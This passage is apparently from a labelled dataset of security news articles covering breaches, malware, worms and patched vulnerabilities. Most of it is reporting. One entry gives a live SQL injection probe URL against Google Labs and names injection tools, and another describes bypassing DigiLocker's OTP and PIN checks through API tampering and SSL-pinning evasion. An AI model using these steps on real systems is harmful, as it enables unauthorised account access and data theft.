At this moment neither I, nor Moore can proof that the company is saving your master key permanently after you once decrypt your data online via Roboform's web app, but in this age of mass surveillance, where every company is gathering our information and damaging our privacy, it is hardly to trust on any company, like - ""we get it, but we don't store it.""
CONCLUSION
PIN bypass vulnerability is working on all rooted and jailbroken devices, and it poses high risk where an app is developed with an aim to store your sensitive data securely with military grade encryption.
We can't judge the intentions of the company, but the reported privacy loopholes could also allow government and law enforcement agencies to scrape our sensitive data by hook or crook.
The company has promised to re-evaluate the way they store the Master Password on mobile devices and will enforce the user to enter their Master Password after a reboot, even if the user chooses the option to set the Master Password to 'Off'.
""This way, if a phone is lost and a third party tries to access RoboForm either by guessing the PIN or bypassing the PIN function, the third party would still be required to know the Master Password,"" said RoboForm.
",Vulnerability
"Linux worm targeting Routers, Set-top boxes and Security Cameras with PHP-CGI Vulnerability",https://thehackernews.com/2013/11/Linux-ELF-malware-php-cgi-vulnerability.html,"A Symantec researcher has discovered a new Linux worm, targeting machine-to-machine devices, and exploits a PHP vulnerability (CVE-2012-1823) to propagate that has been patched as far back as May 2012.
Linux worm, which has been dubbed Linux.Darlloz, poses a threat to devices such as home routers and set-top boxes, Security Cameras, and even industrial control systems. It is based on proof-of-concept code released in late October and it helps spread malware by exploiting a vulnerability in php-cgi.
""Upon execution, the worm generates IP addresses randomly, accesses a specific path on the machine with well-known ID and passwords, and sends HTTP POST requests, which exploit the vulnerability. If the target is unpatched, it downloads the worm from a malicious server and starts searching for its next target."" the Symantec researchers explained.
The malware does not appear to perform any malicious activity other than silently spreading itself and wiping a load of system files.
So far the malware variant targets x86 systems, because the malicious binary downloaded from the attacker's server is in ELF (Executable and Linkable Format) format for Intel architectures.
However, the Symantec researchers claim the attacker also hosts variants of the worm for other architectures including ARM, PPC, MIPS and MIPSEL.
No attacks have been reported in the wild, but warned that most users would not realize they were at risk as they would be unaware that their own devices ran on Linux.
To protect their devices from the worm, users are advised to update their software to the latest version, make device passwords stronger and block incoming HTTP POST requests to the -/cgi-bin/php* paths.
",Vulnerability
Deloitte Hacked — Cyber Attack Exposes Clients' Emails,https://thehackernews.com/2017/09/deloitte-hack.html,"Another day, another data breach. This time one of the world's ""big four"" accountancy firms has fallen victim to a sophisticated cyber attack.
Global tax and auditing firm Deloitte has confirmed the company had suffered a cyber attack that resulted in the theft of confidential information, including the private emails and documents of some of its clients.
Deloitte is one of the largest private accounting firms in the U.S. which offers tax, auditing, operations consulting, cybersecurity advisory, and merger and acquisition assistance services to large banks, government agencies and large Fortune 500 multinationals, among others.
The global accountancy firm said Monday that its system had been accessed via an email platform from October last year through this past March and that ""very few"" of its clients had been affected, the Guardian reports.
The firm discovered the cyber attack in March, but it believes the unknown attackers may have had access to its email system since October or November 2016.
Hackers managed to gain access to the Deloitte's email server through an administrator account that wasn't secured using two-factor authentication (2FA), granting the attacker unrestricted access to Deloitte's Microsoft-hosted email mailboxes.
Besides emails, hackers also may have had potential access to ""usernames, passwords, IP addresses, architectural diagrams for businesses and health information.""
""In response to a cyber incident, Deloitte implemented its comprehensive security protocol and began an intensive and thorough review including mobilising a team of cybersecurity and confidentiality experts inside and outside of Deloitte,"" a Deloitte spokesperson told the newspaper.
""As part of the review, Deloitte has been in contact with the very few clients impacted and notified governmental authorities and regulators.""
Deloitte's internal investigation into the cyber incident is still ongoing, and the firm has reportedly informed only six of its clients that their information was ""impacted"" by the breach.
Deloitte has become the latest of the victim of the high-profile cyber attack. Just last month, Equifax publicly disclosed a breach of its systems that exposed personal data of as many as 143 million US customers.
Moreover, last week the U.S. Securities and Exchange Commission (SEC) also disclosed that hackers managed to hack its financial document filing system and illegally profited from the stolen information.
",Data_Breaches
Dell Resets All Customers' Passwords After Potential Security Breach,https://thehackernews.com/2018/11/dell-data-breach-hacking.html,"Multinational computer technology company Dell disclosed Wednesday that its online electronics marketplace experienced a ""cybersecurity incident"" earlier this month when an unknown group of hackers infiltrated its internal network.
On November 9, Dell detected and disrupted unauthorized activity on its network attempting to steal customer information, including their names, email addresses and hashed passwords.
According to the company, the initial investigation found no conclusive evidence that the hackers succeeded to extract any information, but as a countermeasure Dell has reset passwords for all accounts on Dell.com website whether the data had been stolen or not.
Dell did not share any information on how hackers managed to infiltrate its network at the first place or how many user accounts were affected, but the company did confirm that payment information and Social Security numbers were not targeted.
""Credit card and other sensitive customer information were not targeted. The incident did not impact any Dell products or services,"" Dell says.
You are affected if you have ever created an account on the Dell website to purchase any of their products or to access the online support.
""Upon detection of the attempted extraction, Dell immediately implemented countermeasures and initiated an investigation. Dell also retained a digital forensics firm to conduct an independent investigation and has engaged law enforcement,"" the company said.
We will update this story as more information becomes available.
",Cyber_Attack
FBI cracks International Bot Network !,https://thehackernews.com/2011/04/fbi-cracks-international-bot-network.html,"FBI cracks International Bot Network !
The Department of Justice and FBI declared that it has cracked a network of hackers, who have infected almost 2 million computers with a harmful ""bot"" program, Coreflood that steals private and monetary data from computers.
Identified as a ""bot"" network- as the malware can be managed distantly like a robot- it compromises machines with a software program called Coreflood, which downloads itself by finding out the vulnerability in systems, that are running Windows operating systems.
The legal actions are the key components of the ""most complete and inclusive enforcement action ever taken by the U.S. authorities to put out of action an international botnet"", as per the statement from the Department of Justice, reports cnet News on April 13, 2011.
As per a request from a temporary restraining order that was granted, it's the first time USA law enforcement has taken consent from a court for controlling a botnet.
This malware (Coreflood) stores keystrokes and personal communications, making it enable to compromise login details, like passwords, and other personal and monetary data. Once a system is compromised with Coreflood, the malware contacts a command-and-control server, allowing it to distantly control the compromised machine.
The government replaced the unauthentic command and control servers with substitute servers to prevent Coreflood from being used for any more harmful activity.
U.S. Attorney David B. Fein for the District of Connecticut stated that the seizure of the Coreflood servers and Internet domain names can stop hackers from using Coreflood or systems infected by Coreflood for their evil purpose. He stated that he wished that his industry partners to work in cognition with the law enforcement in order to attain this great result, as per the news by CRN on April 13, 2011.
But, it is impossible to know exactly the number of victims claimed by Coreflood, as machines are continuously being infected, disinfected and sometimes reinfected. While investigators estimated 413, 710 infected machines from March 2009 to January 2010, the total number of machines those were, or had been, part of Coreflood is more than 2.3 million, with almost 1.8 million seems to be located in the USA.
",Malware
191 Million US Voters' Personal Info Exposed by Misconfigured Database,https://thehackernews.com/2015/12/us-voter-database-hacked.html,"BREAKING: A misconfigured database has resulted in the exposure of around 191 Million voter records including voters' full names, their home addresses, unique voter IDs, date of births and phone numbers.
The database was discovered on December 20th by Chris Vickery, a white hat hacker, who was able to access over 191 Million Americans' personal identifying information (PII) that are just sitting in the public to be found by anyone looking for it.
Vickery is the same security researcher who uncovered personal details of 13 Million MacKeeper users two weeks ago, which included names, email addresses, usernames, password hashes, IP addresses, phone numbers, and system information.
However, the recent discovery made him shocked when he saw his own information in the database, according to DataBreaches.net, whom the researcher contacted and provided all the details about his finding.
300GB Trove of Voters' Information Leaked
Vickery has his hands on all 300GB of database contains a long list of voter records including:
Full name (first, middle, last)
Residential address
Mailing address
A unique voter ID
State voter ID
Gender
Date of birth
Date of registration
Phone number
Political affiliation
A detailed voting history since 2000
Fields for voter prediction scores
Not just his own, but Vickery also looked up a number of police officers in his city and confirmed the information was all correct. Reporters from CSO and DataBreaches.net also did the same and upheld the accuracy as well.
Fortunately, the database doesn't contain Social Security Numbers, driver license numbers, or any financial data, but it's still a massive amount of data when it comes to protecting users privacy and security.
What's even more Shocking?
The crazy part of the data breach is no one is taking responsibility for the exposed database.
Vickery, CSO and DataBreaches.net contacted various political tech groups and known voter information companies, but all denied the database belonged to them.
The FBI and Internet Crime Complaint Center were all approached by Vickery and DataBreaches.net; so let's now see how long this information remains alive and accessible for anyone to see.
",Data_Breaches
U.S Emergency broadcast System vulnerable to hackers,https://thehackernews.com/2013/07/us-emergency-broadcast-system.html,"A major vulnerability has been discovered in the U.S. Emergency Alert System, researchers have warned.that could allow hackers to break into the system and broadcast fake messages to the United States.
According to a new report by security firm IOActive, U.S. Emergency Alert System, the system used to broadcast to the United States in times of national crisis can be hacked remotely by hackers.
Recent firmware update of DASDEC-I and DASDEC-II application servers disseminated the secure shell (SSH) keys, that allows anyone with limited knowledge to log in at the root level of the server. Technically, compromising the DASDEC systems doesn't sound too difficult. In that scenario, an attacker could take over the system and issue emergency messages.
Monroe Electronics was notified about vulnerabilities in its equipment in January and the company's internal development team developed a software update that was made available in March.
The Emergency Alert System devices are installed at large and small broadcasters. The EAS is designed to enable to the President of the United States to speak to US citizens within 10 minutes of a major disaster occurring.
These alerts were passed among stations using wire services, which connected to television and radio stations around the U.S. When a station received an official notification, it would disrupt the current broadcast to deliver the message to the public.
",Vulnerability
Apple Kicks Out some Malicious Ad-Blocker Apps from its Online Store,https://thehackernews.com/2015/10/apple-security-hacked.html,"Apple has removed several apps from its official iOS App Store that have the ability to compromise encrypted connections between the servers and the end-users.
Apple has officially said:
We have removed a ""few"" apps from the iOS App Store that could install root certificates and allow monitoring your data.
It's like- they have analyzed and admitted that they lacked in the auditing of the App Store hosted Apps.
The company is also advising its users to uninstall the malicious apps from their iPhones, iPads and iPods in order to prevent themselves from monitoring, though it has yet to name the offending apps.
App Store Apps Spy on Encrypted Traffic
The challenge that stood before Apple was, they discovered that ""few"" of the Apps in the iOS App Store were capable of spying on the users by compromising SSL/TLS security solutions of their online communication.
Root certificates are the fundamental part of how encrypted connections like HTTPS verify the site users are connecting to and creating a secure environment for them to get access to various resources. Their updates also happen on a timely basis.
Root certificates allow public key encryption to browsers and other services to validate certain types of encryption and ensure that user is redirected to that website or server that he requested.
However, in Apple's case, the fraudulent apps were acting as an interface between the secure connections and exposing all private Internet traffic of the user.
However, to get rid of the problem, Apple has removed various apps from their App Store that could decrypt the ""Encrypted Connection"" between the user and the server to which the user is connected to.
Apple Yet to Disclose the names of Offending App
Apple did not disclose the names of such Apps, instead said that there are few of them with bitter intents and for which, they left the users displeased, as:
They want the users to uninstall the Apps, but which ones to remove they are least bothered.
Also, they have given directions for ""How to delete an app that has a configuration profile on your iPhone, iPad, or iPod touch,"" on their support page, but…
...Does that make any difference?
As how are the people going to identify which Apps to uninstall!
Furthermore, in a similar incident developer of an app commonly known as Been Choice was removed from the iOS store, consequently the developer posted on Twitter about they being 'Pulled Off' from iOS store and mentioned that:
""We'll remove ad blocking for FB, Google, Yahoo, and Pinterest apps.""
Therefore, it can be assumed that Been Choice's, Ad-blocker app which functioned in such a way that it installs root certificates in order to block ads inside apps, might be gathering private details of the user through ad blocking facility via installing root certificates.
One thing is important to note here, which is- Apple allowed such Apps that were installing Root certificates on the users' device.
Meanwhile, all the iPhone, iPad and iPod touch device holders are requested to uninstall any suspicious app from there device; until Apple reveals the names of those apps.
",Vulnerability
Millions of Passwords leaked from Social Site Formspring,https://thehackernews.com/2012/07/28-million-passwords-leaked-from-social.html,"Formspring, a social Q&A website popular with teenagers,this week disabled its users' passwords after discovering a security breach. Formspring founder and CEO Ade Olonoh apologized to users for the inconvenience, and advised them to change their passwords when they log back into Formspring.
A blog entry posted by Formspring's CEO and founder Ade Olonoh explains that the passwords of all 28 million users have been disabled and the company was notified that 420,000 password hashes that seem to belong to its users have been posted to a security forum, and immediately began an internal investigation.
Usernames and other identifying information were not posted with the passwords, but Formspring found that someone had broken into one of its development servers and stolen data from a production database.
Encrypted passwords aren't immediately useable, although they can sometimes be decoded by a savvy attacker.
Formspring launched in 2009 as a crowd-powered question-and-answer site. Last month, the company announced a major revamp intended to shift the site's focus toward users' interests.
The company is now reviewing its security practices to ensure that a repeat of the incident does not occur.The algorithm used to hash passwords at the time of the leak was SHA-256 and the company was vigilant enough to use random salts. After this attack, however, it has updated its security stance to use bcrypt.
",Vulnerability
Nemesis Bootkit — A New Stealthy Payment Card Malware,https://thehackernews.com/2015/12/nemesis-banking-malware.html,"Another day, another stunning Malware – this time targeting banks, payment card processors, and other financial services.
Security researchers have uncovered a sophisticated payment card malware that executes before the operating system boots, making the malware very difficult to detect and much less remove.
The malware in question is part of ""Nemesis"" – a malware suite that includes all software programs for capturing screens, transferring files, injecting processes, logging keystrokes, and carrying out other malicious activities on the infected computers.
Nemesis malware family has been seen in the past, targeting banks, ATMs, financial transaction processing, credit unions, and financial business service companies.
Nemesis Bootkit Malware – Reappears even after Re-installation of the OS
The malware with bootkit functionality has been in operation since early this year and has the ability to modify the legitimate VBR (Volume Boot Record) that makes the malware possible to load before Windows starts.
This makes the malicious threat hard to detect and remove using traditional security approaches.
Moreover, the malware resides in a low-level portion of a hard drive.
This makes the malware infection reappears even after the complete reinstallation of the Windows operating system.
""The malware that persists outside of the operating system (OS) requires a different approach to detection and eradication,"" security analysts from FireEye wrote in a blog post published Monday.
""Malware with bootkit functionality can be installed and executed almost entirely independent of the Windows [OS]. As a result, incident responders will need tools that can access and search raw disks at scale for evidence of bootkits.""
How Does the Malware Work?
Early this year, the cyber criminals tweaked Nemesis to include a utility called BOOTRASH that has the ability to modify an infected computer's boot process.
In a normal boot, any Windows PC reads data from a hard drive's MBR (Master Boot Record) that loads the VBR – a piece of code specific to an operating system containing instructions for the OS to begin the boot process.
The process typically looks like this:
The VBR then normally loads the operating system code, but BOOTRASH loads:
First, the malicious code that injects the Nemesis components stored in the virtual file system into the Windows kernel
Then the Operating System code
Since BOOTRASH is loaded outside of the machine's OS, it is not subject to any kind of integrity checks, nor are any of its components scanned by system's Anti-Virus program, which helps the malware evade detection.
According to the researchers, versions of BOOTRASH are targeting both 32-bit and 64-bit Windows architectures. Moreover, due to this newly added Bootkit component, reinstalling the OS will not remove the Nemesis malware.
Hackers behind Nemesis Malware
FireEye researchers believe the Nemesis bootkit malware belongs to a financial crime group of hackers, likely based in Russia, called FIN1.
""We identified the presence of a financially motivated threat group that we track as FIN1, whose activity at the organization dated back several years,"" FireEye researcher wrote. ""The threat group deployed numerous malicious files and utilities, all of which were part of a malware ecosystem referred to as 'Nemesis' by the malware developer(s).""
The researchers believe that the FIN1 hacking group used this malware, most of the times, to access victims environment and steal cardholders data. In the past, the researchers came across different versions of the Nemesis family when they analyzed FIN1's malware.
How to Protect Your Systems From Nemesis Bootkit Malware?
Re-installing the operating system of your Windows machine is not a sufficient method to get rid of this malware.
The solution against this malware threat is to use software tools that can access and scan raw disks at scale for evidence of Bootkits, or physically wipe the disks before reinstalling the operating system.
""System administrators should perform a complete physical wipe of any systems compromised with a bootkit and then reload the operating system,"" FireEye researchers recommend.
Nemesis is by no means the first malware family to hijack normal boot process of a PC in an effort to gain persistence and stealth, but it is not the first malware family that contains bootkit functionality.
In the past, researchers detected malicious threats such as TDL4 (Olmarik), Rovnix, Necurs, and Carberp. Among these, Carberp banking trojan targeted financial institutions.
",Malware
Any Indian DigiLocker Account Could've Been Accessed Without Password,https://thehackernews.com/2020/06/aadhar-digilocker-hacked.html,"The Indian Government said it has addressed a critical vulnerability in its secure document wallet service Digilocker that could have potentially let a remote attacker bypass mobile one-time passwords (OTP) and sign in as other users.
Discovered separately by two independent bug bounty researchers, Mohesh Mohan and Ashish Gahlot, the vulnerability could have been exploited easily to unauthorisedly access sensitive documents uploaded by targeted users' on the Government-operated platform.
""The OTP function lacks authorization which makes it possible to perform OTP validation with submitting any valid users details and then manipulation flow to sign in as a totally different user,"" Mohesh Mohan said in a disclosure shared with The Hacker News.
With over 38 million registered users, Digilocker is a cloud-based repository that acts as a digital platform to facilitate online processing of documents and speedier delivery of various government-to-citizen services. It's linked to a user's mobile number and Aadhar ID—a unique identity number (UID) issued to every resident of India.
According to Mohan, all an attacker needs to know is either victim's Aadhaar ID or linked mobile number or username to unauthorizedly access a targeted Digilocker account, prompting the service to send an OTP and subsequently exploiting the flaw to bypass the sign-in process.
It's worth noting that the mobile app version of Digilocker also comes with a 4-digit PIN for an added layer of security. But the researchers said it was possible to modify the API calls to authenticate the PIN by associating the PIN to another user (identified with a version-5 UUID) and successfully login in as the victim.
This means ""you can do the SMS OTP [verification] as one user and submit the pin of a second user, and finally, you will end up logging as the second user,"" Mohan said.
What's more, the lack of authorization for the API endpoint used to set the secret PIN effectively implies the API can be exploited to reset the PIN linked to a random user using the individual's UUID.
""There is no session-related information on the POST request, so it's not bound to any user,"" Mohan added.
In addition to the issues mentioned above, the API calls from mobile apps were secured by basic authentication that can be circumvented by removing a header flag ""is_encrypted: 1."" The application was also found to implement a weak SSL pinning mechanism, making them vulnerable to a bypass using tools like Frida.
After the flaw was reported to CERT-In on May 10 by Mohan and to DigiLocker on 16th May by Ashish, the cyber agency said the issue was fixed on May 28.
""The nature of the vulnerability was such that an individual's DigiLocker account could potentially get compromised if the attacker knew the username for that particular account,"" Digilocker said in a tweet last week acknowledging the flaw. ""It was not a vulnerability that could let anyone get access to [the] DigiLocker account of anyone whose username and other details were not known.""
""Upon analysis, it was discovered that this vulnerability had crept in the code when some new features were added recently. The vulnerability was patched on a priority basis by the technical team within a day of getting the alert from CERT-In. This was not an attack on infrastructure, and no data, database, storage, or encryption was compromised,"" the team added.
",Vulnerability
Sabpab - Another Mac os Backdoor Trojan Discovered,https://thehackernews.com/2012/04/sabpab-another-mac-os-backdoor-trojan.html,"Sabpab - Another Mac os Backdoor Trojan Discovered
Security firm Sophos has discovered more malware for the Mac OS X platform called Sabpab. It uses the same Java vulnerability as Flashback to install itself as a ""drive-by download."" Users of older versions of Java now have still more malware to worry about.
It also doesn't require any user interaction to infect a system either just like Flashback all that needs to happen is for you to visit an infected webpage. Sabpab, according to Sophos, installs a backdoor that allows the hackers to capture screen snapshots, upload or download files and execute commands on infected Macs remotely.
The Trojan creates the files
/Users//Library/Preferences/com.apple.PubSabAgent.pfile
/Users//Library/LaunchAgents/com.apple.PubSabAGent.plist
Encrypted logs are sent back to the control server, so the hackers can monitor activity. Although one variant of Flashback installed a file in the LaunchAgents folder, not all tools for detecting Flashback do anything with that folder.
Symantec identifies the trojan as OSX.Sabpab which exploits the Oracle Java SE Remote Java Runtime Environment Denial Of Service Vulnerability (BID 52161) in order to install itself on to the compromised computer.
Sophos products, including free Mac anti-virus for home users, detect the Trojan horse as OSX/Sabpab-A.
",Malware
New 0-Day Flaw Affecting Most Android Phones Being Exploited in the Wild,https://thehackernews.com/2019/10/android-kernel-vulnerability.html,"Another day, another revelation of a critical unpatched zero-day vulnerability, this time in the world's most widely used mobile operating system, Android.
What's more? The Android zero-day vulnerability has also been found to be exploited in the wild by the Israeli surveillance vendor NSO Group—infamous for selling zero-day exploits to governments—or one of its customers, to gain control of their targets' Android devices.
Discovered by Project Zero researcher Maddie Stone, the details and a proof-of-concept exploit for the high-severity security vulnerability, tracked as CVE-2019-2215, has been made public today—just seven days after reporting it to the Android security team.
The zero-day is a use-after-free vulnerability in the Android kernel's binder driver that can allow a local privileged attacker or an app to escalate their privileges to gain root access to a vulnerable device and potentially take full remote control of the device.
Vulnerable Android Devices
The vulnerability resides in versions of Android kernel released before April last year, a patch for which was included in the 4.14 LTS Linux kernel released in December 2017 but was only incorporated in AOSP Android kernel versions 3.18, 4.4 and 4.9.
Therefore, most Android devices manufactured and sold by a majority of vendors with the unpatched kernel are still vulnerable to this vulnerability even after having the latest Android updates, including below-listed popular smartphone models :
Pixel 1
Pixel 1 XL
Pixel 2
Pixel 2 XL
Huawei P20
Xiaomi Redmi 5A
Xiaomi Redmi Note 5
Xiaomi A1
Oppo A3
Moto Z3
Oreo LG phones
Samsung S7
Samsung S8
Samsung S9
To be noted, Pixel 3, 3 XL, and 3a devices running the latest Android kernels are not vulnerable to the issue.
Android Flaw Can Be Exploited Remotely
According to the researcher, since the issue is ""accessible from inside the Chrome sandbox,"" the Android kernel zero-day vulnerability can also be exploited remotely by combining it with a separate Chrome rendering flaw.
""The bug is a local privilege escalation vulnerability that allows for a full compromise of a vulnerable device. If the exploit is delivered via the Web, it only needs to be paired with a renderer exploit, as this vulnerability is accessible through the sandbox,"" Stone says in the Chromium blog.
""I've attached a local exploit proof-of-concept to demonstrate how this bug can be used to gain arbitrary kernel read/write when running locally. It only requires the untrusted app code execution to exploit CVE-2019-2215. I've also attached a screenshot (success.png) of the POC running on a Pixel 2, running Android 10 with security patch level September 2019.""
Patches to be Made Available Soon
Though Google will release a patch for this vulnerability in its October's Android Security Bulletin in the coming days and also notified OEMs, most affected devices would not likely receive the patch immediately, unlike Google Pixel 1 and 2.
""This issue is rated as High severity on Android and by itself requires installation of a malicious application for potential exploitation. Any other vectors, such as via web browser, require chaining with an additional exploit,"" the Android security team said in a statement.
""We have notified Android partners, and the patch is available on the Android Common Kernel. Pixel 3 and 3a devices are not vulnerable while Pixel 1 and 2 devices will be receiving updates for this issue as part of the October update.""
Google's Project Zero division usually gives software developers a 90-day deadline to fix the issue in their affected products before going public with the details and PoC exploits, but in case of active exploits, the team goes public after seven days of privately being reported.
What's your take? Although this vulnerability is severe and can be used to gain root access to an Android device, users need not worry that much as the exploitation of such issues is mostly limited to targeted attack scenarios.
Nevertheless, it's always a good idea to avoid downloading and installing apps from third-party app stores and any unnecessary apps, even from the Google Play Store.
",Vulnerability
Hackers Exploit Accellion Zero-Days in Recent Data Theft and Extortion Attacks,https://thehackernews.com/2021/02/hackers-exploit-accellion-zero-days-in.html,"Cybersecurity researchers on Monday tied a string of attacks targeting Accellion File Transfer Appliance (FTA) servers over the past two months to data theft and extortion campaign orchestrated by a cybercrime group called UNC2546.
The attacks, which began in mid-December 2020, involved exploiting multiple zero-day vulnerabilities in the legacy FTA software to install a new web shell named DEWMODE on victim networks and exfiltrating sensitive data, which was then published on a data leak website operated by the CLOP ransomware gang.
But in a twist, no ransomware was actually deployed in any of the recent incidents that hit organizations in the U.S., Singapore, Canada, and the Netherlands, with the actors instead resorting to extortion emails to threaten victims into paying bitcoin ransoms.
According to Risky Business, some of the companies that have had their data listed on the site include Singapore's telecom provider SingTel, the American Bureau of Shipping, law firm Jones Day, the Netherlands-based Fugro, and life sciences company Danaher.
Following the slew of attacks, Accellion has patched four FTA vulnerabilities that were known to be exploited by the threat actors, in addition to incorporating new monitoring and alerting capabilities to flag any suspicious behavior. The flaws are as follows -
CVE-2021-27101 - SQL injection via a crafted Host header
CVE-2021-27102 - OS command execution via a local web service call
CVE-2021-27103 - SSRF via a crafted POST request
CVE-2021-27104 - OS command execution via a crafted POST request
FireEye's Mandiant threat intelligence team, which is leading the incident response efforts, is tracking the follow-on extortion scheme under a separate threat cluster it calls UNC2582 despite ""compelling"" overlaps identified between the two sets of malicious activities and previous attacks carried out by a financially motivated hacking group dubbed FIN11.
""Many of the organizations compromised by UNC2546 were previously targeted by FIN11,"" FireEye said. ""Some UNC2582 extortion emails observed in January 2021 were sent from IP addresses and/or email accounts used by FIN11 in multiple phishing campaigns between August and December 2020.""
Once installed, the DEWMODE web shell was leveraged to download files from compromised FTA instances, leading to the victims receiving extortion emails claiming to be from the ""CLOP ransomware team"" several weeks later.
Lack of reply in a timely manner would result in additional emails sent to a wider group of recipients in the victim organization as well as its partners containing links to the stolen data, the researchers detailed.
Besides urging its FTA customers to migrate to kiteworks, Accellion said fewer than 100 out of 300 total FTA clients were victims of the attack and that less than 25 appear to have suffered ""significant"" data theft.
The development comes after grocery chain Kroger disclosed last week that HR data, pharmacy records, and money services records belonging to some customers might have been compromised as a result of the Accellion incident.
Then earlier today, Transport for New South Wales (TfNSW) became the latest entity to confirm that it had been impacted by the worldwide Accellion data breach.
""The Accellion system was widely used to share and store files by organisations around the world, including Transport for NSW,"" the Australian agency said. ""Before the attack on Accellion servers was interrupted, some Transport for NSW information was taken.""
",Cyber_Attack
SQL Injection Vulnerability in Google Lab Database System,https://thehackernews.com/2011/06/sql-injection-vulnerability-in-google.html,"SQL Injection Vulnerability in Google Lab Database System
Very Big & Critical Vulnerability detected in Google Lab System. Vendor is already reported by hackers, But they don't take positive step in this case, so finally hackers exposed the vulnerability in public by Bangladesh Cyber Army Admin - Shadman Tanjim on their Forum.
Google Lab Website has SQL Injection Vulnerability and Dangerous thing is this Vulnerability is Exploitable. Hackers are able to get Tables, columns and data from Database. Google Lab Database has his own customize DB system. But Interesting things is their database system is Similar as Ms Access database. In this case Ms Access SQL Injection System is Also Work on Google Lab Database system.
Statement By Hacker :
I already contact with Google Corporation but they don't give positive response, I think this is their big fault, and will suffer for that. But if they give Positive response then this will be very good for them. Thanks a Ton!!!
Shadman Tanjim
Ethical Hacker, Programmer and Security Professional
Email: admin@bdcyberarmy.com or shadman2600@gmail.com
Website: www.bdcyberarmy.com/forum
Greets to: Shahee Mirza, Almas Zaman, Sayem Islam, Pudina pata, LuckyFm and All
Bangladesh Cyber Army Members.
Video Download link:
https://www.bdcyberarmy.com/Google/google_video.avi
Hackers Release Step by step proof about this Vulnerability
1. Website : www.googlelabs.com or labs.google.com
2. Vulnerability type : SQL Injection
3. Vulnerable url : https://www.googlelabs.com/?q=%27&apps=Search+Labs
4. Info:
Host IP: 209.85.175.141
Web Server: Google Frontend
Keyword Found: Fast
Injection type is Integer
Let's Check Exploiting this Vulnerable link. Here Hackers use 3 Famous SQL Injection tools. They are:
1. Havij Advance SQL Injection Tool
2. Safe3 SQL Injector v8.4
3. Pangolin SQL Injection Tool
1st Work with Havij Advance SQL Injection Tool:
Screen Shot 1: Scan Vulnerable link and it says this website is Vulnerable.
Screen Shot 2: Now it scans and gets all tables and columns
Screen Shot 3: Now you can see list of tables and Columns
And this is a Prove for this Website is Genuine SQL Injection Vulnerable. Here you see this database type is MS Access, so this is a Proof of this concept. Some people should Say Google Lab Database System is not Ms Access but this Website Database is Similar as Ms Access database and Ms Access SQL Injection Query are also Work on Google Labs Database system. As like MySQL 5 and MySQL 4.1 both are injected via Union select, but both are not have Information Schema.
2nd now Work with Safe3 SQL Injector v8.4:
Screen Shot 1: Analyzing Vulnerable link and it says it's vulnerable and gets keyword and db type.
Screen Shot 2: Now it's Inject the vulnerable link and gets All Table list and column list
This is another Prove for this Website Vulnerability and we can see this and Dangerous thing is its Exploitable. Now we check our last SQL Injection tool for 100% Satisfy.
3rd Pangolin SQL Injection Tool:
Screen Shot 1: Scan vulnerable link and its say this website is vulnerable
Screen Shot 2: Now inject this Website and get tables and columns list
Screen Shot 3: Here is a full List of Tables and Columns list
Now I think we are 100% Sure Google Lab Website is SQL Injection Vulnerable.
You Can Check Video. This Video is also made by Bangladesh Cyber Army Member - Shadman Tanjim.
UPDATE :
Google insist that there has been no intrusion. The company claims that their GQL database won't allow SQL injection attacks. Additionally, they say that the data that appears in the screen shots, does not exist anywhere in their data stores.
On this Shadman Tanjim - Hackers Reply to Google ""Proof it. because I am Also Proof it's Vulnerable. If they say's Google Lab is Not Vulnerable, It Means We get new Bugs in Some Famous SQL Injection tools. And also and 1=1 concept. So tell them to proof this and I don't think All tools are false. because 1 tools can false, 2 tools can get false but not All. ALL Tools say's it is Vulnerable, So i don't think it any confusion. :D ""
",Vulnerability
T-Mobile Hacked — 2 Million Customers' Personal Data Stolen,https://thehackernews.com/2018/08/t-mobile-hack-breach.html,"T-Mobile today confirmed that the telecom giant suffered a security breach on its US servers on August 20 that may have resulted in the leak of ""some"" personal information of up to 2 million T-Mobile customers.
The leaked information includes customers' name, billing zip code, phone number, email address, account number, and account type (prepaid or postpaid).
However, the good news is that no financial information like credit card numbers, social security numbers, or passwords, were compromised in the security breach.
According to a brief blog post published by the company detailing the incident, its cybersecurity team detected and shut down an ""unauthorized capture of some information"" on Monday, August 20.
Although the company has not revealed how the hackers managed to hack into its servers neither it disclosed the exact number of customers affected by the data breach, a T-Mobile spokesperson told Motherboard that less than 3 percent of its 77 million customers were affected.
The spokesperson also said that unknown hackers part of ""an international group"" managed to access T-Mobile servers through an API that ""didn't contain any financial data or other very sensitive data,"" adding ""We found it quickly and shut it down very fast.""
T-Mobile said the company informed law enforcement about the security breach and is reaching out to its affected customers directly via SMS message, letter in the mail, or a phone call to notify them as well.
""We take the security of your information very seriously and have a number of safeguards in place to protect your personal information from unauthorized access,"" T-Mobile said. ""We truly regret that this incident occurred and are so sorry for any inconvenience this has caused you.""
The U.S. telecom giant is also encouraging affected customers to contact its customer service through 611 for any information regarding the breach.
The T-Mobile incident marks the latest high-profile data breach and adds itself to the list of that other recent high profile attacks took place against Carphone Warehouse that affected its 10 million customers, and Ticketmaster that affected tens of thousands of its customers.
Did you receive any notification regarding this data breach? Let us know in the comments below.
",Cyber_Attack
Google Patches 6 Critical Android Mediaserver Bugs in May Security Update,https://thehackernews.com/2017/05/android-security-update.html,"In Brief
Google has released its monthly security patches for Android this week, addressing 17 critical vulnerabilities, 6 of which affect Android Mediaserver component that could be used to execute malicious code remotely.
Besides patches for Mediaserver, Google also fixed 4 critical vulnerabilities related to Qualcomm components discovered in Android handsets, including Google's Nexus 6P, Pixel XL, and Nexus 9 devices.
According to the Google security bulletin for Android published Monday, this month's security update is one of the largest security fixes the company ever compiled in a single month.
Google has split Android's monthly security bulletin into security ""patch levels"":
Partial security patch level (2017-05-01) covers patches for vulnerabilities that are common to all Android devices.
Complete security patch level (2017-05-05) includes additional fixes for hardware drivers as well as kernel components that are present only in some devices.
Critical RCE Flaw in Android Mediaserver
The most severe vulnerability exists in Mediaserver – an Android component that handles the processing of image and video files and has been a source of many issues over the past few years, including the critical Stagefright vulnerabilities.
According to the search engine giant, the Mediaserver vulnerability ""could enable remote code execution on an affected device through multiple methods such as email, web browsing, and MMS when processing media files.""
In other words, attackers could exploit the Mediaserver vulnerability by tricking users into downloading a specially crafted multimedia file on their devices, or sharing the media file via email or other messaging apps and remotely execute arbitrary code.
Interestingly, this vulnerability could be triggered while you sleep, as it's not even necessary for you to open the file because as soon as your device receives the media file, the file system will cause Mediaserver to process it.
The vulnerability was discovered in early January and affects Android versions 4.4.4 KitKat through 7.1.2 Nougat.
Kernel-level Vulnerabilities in Qualcomm
Google has also patched four critical vulnerabilities that stemmed from Qualcomm components and could allow an attacker to gain high-level (root) privileges on an Android device.
